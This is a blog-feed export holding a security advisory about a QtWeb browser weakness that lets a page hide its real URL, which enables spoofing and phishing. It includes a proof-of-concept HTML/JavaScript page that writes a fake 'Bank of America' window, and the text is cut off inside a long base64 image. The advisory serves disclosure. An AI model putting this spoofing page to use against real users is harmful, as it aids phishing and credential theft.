tag:blogger.com,1999:blog-90115782012-01-09T20:58:52.600+01:00Security Research &amp; Analisys:<br> Personal Blog where I expose my investigations,<br> advisores and some outstanding news on security.<br>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comBlogger187125tag:blogger.com,1999:blog-9011578.post-54194734087003927472011-10-03T12:55:00.001+02:002011-10-03T12:57:09.093+02:002011-10-03T12:57:09.093+02:00#################################################<br /> QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks<br /> Vendor URL: http://www.qtweb.net/<br /> Vendor bugtrack=&gt; http://code.google.com/p/qtweb/issues/detail?id=151<br /> Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html<br /> Vendor notify: YES exploit available: YES<br /> ##################################################<br /> <br /> ###################<br /> Description By vendor<br /> ###################<br /> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).</div> <br /> ######################<br /> Vulnerability Description<br /> ######################<br /> <br /> <div style="text-align: left;"> In a normal case when navigate to a site, the browser shows real URL But it has a weakness and a attacker can show a empty URL. This weakness can be used for pishing or spoof attacks because you can think that&nbsp; you are in bank of america for example and the browser don't show nothing in&nbsp; URL:) </div> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody> <tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s1600/qt1.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s400/qt1.jpg" width="400" /></a></td></tr> <tr><td class="tr-caption" style="text-align: center;"><b><span style="color: black;">Whithout Any URL</span></b></td></tr> </tbody></table> <div style="text-align: justify;"> Also a attacker can compose a popup with atributes and it can be used too for spoof or phishing attacks. toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0 </div> <table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody> <tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s1600/qt2.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s400/qt2.jpg" width="400" /></a></td></tr> <tr><td class="tr-caption" style="text-align: center;"><b>Popup Whithout Toolbars and address bar</b></td></tr> </tbody></table> ################<br /> Versions afected<br /> ################<br /> <br /> QTweb 3.7.2 Vulnerable<br /> QTweb 3.7.3 (buils 087) Vulnerable<br /> and posible prior versions.<br /> <br /> ######################<br /> Proof Of Concept<br /> ######################<br /> &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &nbsp; &lt;title&gt;QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon&lt;/title&gt;<br /> &nbsp; &lt;script type="text/javascript"&gt;<br /> var wx;<br /> function invokePoC() {<br /> &nbsp; wx = open(":#:","newwin");<br /> &nbsp; setInterval("doit()",1);<br /> }<br /> function doit() {<br /> &nbsp; wx.document.open();<br /> &nbsp; wx.document.write("&lt;title&gt;Bank of America | Home | Personal&lt;/title&gt;&lt;img src='data:image/gif;base64,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